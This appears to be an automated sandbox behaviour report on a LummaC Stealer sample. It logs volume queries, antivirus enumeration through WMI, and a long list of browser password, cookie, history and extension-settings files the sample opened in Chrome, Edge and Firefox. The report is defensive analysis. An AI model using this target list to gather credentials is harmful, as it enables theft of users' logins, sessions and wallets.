Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe

Code function: 5_2_01035FBB GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

5_2_01035FBB

Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe

Code function: 9_2_6BB562FC _lock,__tzname,_get_timezone,_get_daylight,_get_dstbias,___lc_codepage_func,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__timezone,__daylight,__dstbias,strcmp,free,_strlen,_malloc_crt,_strlen,strcpy_s,__invoke_watson,free,strncpy_s,atol,atol,atol,strncpy_s,__timezone,__daylight,

9_2_6BB562FC

Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe

9_2_6BB7BE38

Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
